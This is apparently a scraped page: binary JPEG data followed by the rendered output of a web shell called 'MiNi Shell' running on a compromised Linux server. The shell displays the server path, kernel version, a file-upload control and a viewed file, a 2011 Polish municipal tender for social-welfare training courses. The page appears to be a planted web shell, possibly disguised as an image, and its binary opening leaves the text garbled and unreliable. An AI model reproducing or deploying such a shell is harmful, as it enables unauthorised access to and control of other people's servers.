JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110525/127858-N-2011.html

<p class="kh_header"><b>Chełmża: Zorganizowanie i przeprowadzenie szkoleń w związku z realizacja przez Miejski Ośrodek Pomocy Społecznej w Chełmży Projektu pod nazwą: Aktywizacja społeczno - zawodowa szansą na niezależność, realizowanego na podstawie umowy zawartej z Regionalnym Ośrodkiem Polityki Społecznej w Toruniu o dofinansowanie ww. Projektu w ramach Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez Ośrodki Pomocy Społecznej współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, dla osób będących pod opieką MOPS Chełmża</b><br>
<b>Numer ogłoszenia: 127858 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Hallera 19, 87-140 Chełmża, woj. kujawsko-pomorskie, tel. 56 6752469, faks 56 6753018.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.chelmza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń w związku z realizacja przez Miejski Ośrodek Pomocy Społecznej w Chełmży Projektu pod nazwą: Aktywizacja społeczno - zawodowa szansą na niezależność, realizowanego na podstawie umowy zawartej z Regionalnym Ośrodkiem Polityki Społecznej w Toruniu o dofinansowanie ww. Projektu w ramach Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez Ośrodki Pomocy Społecznej współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, dla osób będących pod opieką MOPS Chełmża.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i  przeprowadzenie szkoleń  pod nazwą:
CZĘŚĆ 1 FLORYSTKA - dla 15 uczestników,  65 godzin. Celem szkolenia jest zapoznanie uczestników z wiedzą i umiejętnościami z zakresu florystyki, tworzenia kompozycji kwiatowych  na różne okazje. Szkolenie musi być podzielone na część teoretyczną w której to uczestniczki zapoznają się z zasadami BHP przy wykonywaniu takiej pracy, materiały stosowane w pracy z kwiatami, narzędzia,  techniki przedłużania żywotności. Zapoznanie uczestniczek z technikami układania kompozycji kwiatowych, linie we florystyce, formy, barwy, różne typy kompozycji kwiatowych. Zasady strojenia stołu i sal na różne okazje np. Boże Narodzenie, Wielkanoc itd.  Część praktyczna ma za zadanie przyuczyć uczestniczki szkolenia do samodzielnego wykonywania kompozycji roślinnych, wieńców, wiązanek  z zastosowaniem omawianych wcześniej metod. Wykonawca w celu pełnego wykonania zamówienia musi zapewnić dla każdej z Pań własne stanowisko pracy, wyposażone w różnego rodzaju gąbki, kosz, materiały ozdobne, kwiaty żywe i sztuczne w ilości min. po 20 szt różnego rodzaju / osobę, niezbędne narzędzia.
CZĘSĆ 2 KUCHARZ - dla 10 uczestników, ilość godzin zajęć dydaktycznych 90. Celem szkolenia jest przygotowanie uczestników do samodzielnego tworzenia własnych koncepcji potraw, zapoznanie się ze sztuka kulinarną, zapoznanie z technikami stosowanymi w gastronomi. Zapoznani z przepisami BHP i HACCP. Sporządzanie zup, potraw mięsnych, podrobów, ryb, potraw zbożowych, zakąsek. W programie szkolenia musi znajdować  się część teoretyczna: jak i praktyczne wykonywanie potraw przez uczestników szkolenia. W programie szkolenia należy podać szczegółowo moduły jakie zostaną przeprowadzone na szkoleniu. Każdemu uczestnikowi szkolenia należy zapewnić własne stanowisko pracy, produkty spożywcze jaki i przedmioty niezbędne do ich przygotowywania.
CZĘŚĆ 3 PANELARZ- dla 10 uczestników, ilość godzin zajęć dytaktycznych 71. Celem szkolenia jest przygotowanie uczestników do samodzielnego układania paneli podłogowych. Jak przygotować stanowisko pracy, wybrać odpowiednie materiały, ocenić jakość wykonanej pracy a także usunąć usterki. Szkolenie musi być podzielone na część teoretyczną: gdzie uczestnicy zapoznają się z wiedzą na temat zasad BHP, konstrukcji podłoży, przygotowania posadzki pod panele podłogowe, izolacje - jego zadania i rodzaje, wykończenia, podział materiałów wykończeniowych, warunki techniczne wykonania i odbioru robót. Część praktyczna będzie przeprowadzona w sali MOPS w Chełmży gdzie do tego celu jest przewidziane pomieszczenie o powierzchni 60 m 2. Uczestnicy mają nauczyć się metod układania paneli podłogowych, dostosowywania izolacji do danego typu podłogi, technologii wykończeniowych.
 Panele podłogowe, izolacje oraz wykończenia na których będą się uczyć kursanci mają pozostać do użyteczności MOPS w Chełmży. Mają one spełniać normy użyteczności odpowiednie dla pomieszczeń biurowych tzn. z odpornością na dużą ścieralność.
CZĘŚĆ 4 NAUKA OBSŁUGI KOMPUTERA - dla 10 uczestników, ilość godzin zajęć dydaktycznych 60. Celem szkolenia jest nabycie przez uczestników szkolenia kompetencji informatycznych, wykorzystywanie ich w codziennym życiu. Uświadomienie iż posługiwanie się komputerem pomaga w zdobywaniu nieograniczonej ilości informacji. W programie szkolenia musi znajdować  się program komputerowy jego instalacja i uruchamianie, zapoznanie z edytorem tekstu, wykorzystanie drukarki i skanera, poszukiwanie - pobieranie informacji w Internecie - encyklopedie, korzystanie z własnego konta e-mail, redagowanie wiadomości, wiadomości graficzne, dźwiękowe. Radio, telewizja, prasa w Internecie, załatwianie spraw urzędowych przez Internet, nauka przez Internet. Efektem końcowym zdobytej wiedzy jest przygotowanie prezentacji w Power Point na dowolny temat.
CZĘŚĆ 5 - KURS PIERWSZEJ POMOCY-  dla 45 uczestników w 4 grupach, ilość godzin zajęć 6 na osobę.  Celem szkolenia jest zapoznanie uczestników z wiedzą i umiejętnością postępowania w przypadku sytuacji zagrażającej zdrowiu i życiu ludzi.
W programie szkolenia musi znajdować  się część teoretyczna jaki i ćwiczenia praktyczne na fantomie. Zakres szkolenia powinien obejmować między innymi: postępowanie w przypadku urazów mechanicznych, chemicznych i termicznych. Pomoc w przypadku wstrząsu pourazowego, poszkodowanym nieprzytomnym, resustytucji krążeniowo oddechowej. Pomoc w momencie zadławienia, zachłyśnięcia , ataku epilepsji.
CZĘĆŚ 6 GRUPA WSPARCIA - dla 10 uczestników, ilość godzin zajęć dydaktycznych 30. Celem warsztatów jest zwrócenie uwagi młodzieży na konsekwencje jakie niesie za sobą używanie dopalaczy i innych środków psychoaktywnych. Szkolenie ma ukazać jakie uszkodzenia dla zdrowia i życia może spowodować stosowanie, nadużywanie dopalaczy, alkoholu, papierosów i innych używek. Należy ukazać młodzieży jakie są podstawowe objawy uzależnień. Szkolenie ma na celu ukazać młodzieży jak spędzać wolny czas z dala od uzależnień.
CZĘŚĆ 7 SZKOŁA RODZICA - dla 30 uczestników, ilość godzin zajęć dydaktycznych 30. Celem warsztatów jest zwrócenie uwagi rodziców na  n poznanie i zrozumienie świata i uczuć własnych  oraz dziecka, wspieranie rodziców w kontaktach z dziećmi i młodzieżą. Szkolenie maja za zadanie pomóc rodzicom w wyrażaniu oczekiwań wobec własnych dzieci, przełamywaniu barier w kontaktach z dziećmi, modyfikowanie niepożądanych zachowań dzieci a także budowanie własnej wartości, wiary we własne możliwości i siły, samodyscypliny i usamodzielniania się dzieci. Uświadomienie rodzicom, iż skuteczność wychowania zależy głównie od rodzica, jego zapatrywań na świat wartości jakimi się kieruje według których postępuje. Nie poddawanie się stereotypom wychowawczym a budowanie prawidłowych relacji między członkami rodziny niosącymi miłość akceptację i bezpieczeństwo.
CZĘŚĆ 8 KONSULTACJA Z DORADCĄ ZAWODOWYM - dla 45 uczestników w dwóch grupach: I grupa 10 osób, II grupa 35 osób, ilość godzin zajęć dydaktycznych: I grupa  5 godzin zajęcia grupowo i po 4 godziny na osobę indywidualnej konsultacji, II grupa 5 godzin zajęcia grupowo i po 2 godziny na osobę indywidualnej konsultacji. Celem warsztatów jest pomoc w określeniu celu zawodowego beneficjenta, ukazanie mocnych stron, zainteresowań i umiejętności, wzmocnienie poczucia własnej wartości, kształtowanie umiejętności  wyznaczania celów. Poprzez zastosowanie odpowiednich metod odkrycie predyspozycji zawodowych, odpowiednie metody, opracowanie indywidualnego planu działania (IPD)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-8, 80.53.31.00-8, 80.56.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jest instytucją szkoleniową  w  rozumieniu  ustawy  z  dnia  20  kwietnia  2004  r.  o  promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiada wpis do rejestru instytucji szkoleniowych
Ocena spełniania ww. warunków dokonana będzie przez Zamawiającego poprzez weryfikację wpisu  do  RIS  w  elektronicznej  bazie  danych  prowadzonej  przez  wojewódzki  urząd  pracy właściwy  ze  względu  na siedzibę   instytucji  szkoleniowej.  Warunek  zostanie  uznany  za spełniony, jeżeli instytucja szkoleniowa będzie figurowała w Rejestrze Instytucji Szkoleniowych jako instytucja aktywna w roku 2011.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli  Wykonawca wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał:
- co najmniej 2 kursy dla minimum 10 osób każdy w zakresie i w wymiarze jaka będzie wykładana na kursie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował:
  potencjałem technicznym (lokal, wyposażenie, stanowiska do zajęć praktycznych) adekwatnym do zamówienia umożliwiającym realizację szkolenia, (jeśli dotyczy)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował:
-  osobami  o  wykształceniu  kierunkowym  związanym  z  tematyką  szkolenia,  posiadających
przygotowanie pedagogiczne i doświadczeniu:
  min. 1 wykładowcą/trenem  posiadającymi  doświadczenie  zawodowe  w postaci przeprowadzonych w okresie ostatnich 3 lat min. 3 szkoleń grupowych z zakresu tematyki szkolenia, jaka będzie wykładana na kursie,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. dokonana bedzie przez Zamawiającego wg formuły spełnia - nie spełnia na podstawie oświadczenia Wykonawcy (Załacznik 8 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Program szkolenia (wzór - zał. nr 6 do SIWZ)
2. Kalkulacja ceny szkolenia (wzór - zał. nr 7 do SIWZ)
3. Wzory zaświadczeń potwierdzających ukończenie szkolenia i nabycie kwalifikacji
4.  Wzory ankiet które zostaną przeprowadzone  (ewaluacyjne na początki i na końcu szkolenia, oceniające szkolenie)
 5.  Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik.
     6.  Pełnomocnictwo, w przypadku podmiotów występujących wspólnie, do reprezentowania ich w          postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiany   terminu	rozpoczęcia   lub   zakończenia   szkolenia	wywołanej	w   szczególności nie skompletowaniem   na czas   pełnej grupy   szkoleniowej   lub   przyczynami   niezależnymi   od Wykonawcy i Zamawiającego (np. działania siły wyższej),
2.  Zmiany w kadrze dydaktycznej,  gdy konieczność jej  dokonania wynika z  przyczyn  losowych, niezależnych od Wykonawcy.  Zmiana ta nie może prowadzić do obniżenia wymagań określonych w SIWZ. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ,
3.  Zmiany miejsca realizacji zajęć,  gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ,
4.  Zmiany harmonogramu zajęć- w uzasadnionych przypadkach i  za  zgodą    Zamawiającego.
5.  Zmiany ilości osób kierowanych na szkolenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Chełmży, ul. Gen. Hallera 19, 87-140 Chełmża.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Chełmży, ul. Gen. Hallera 19, 87-140 Chełmża - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Aktywizacja społeczno - zawodowa szansą na niezależność,  realizowanego na podstawie umowy zawartej z Regionalnym Ośrodkiem Polityki Społecznej w Toruniu o dofinansowanie ww. Projektu w ramach Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez Ośrodki Pomocy Społecznej współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com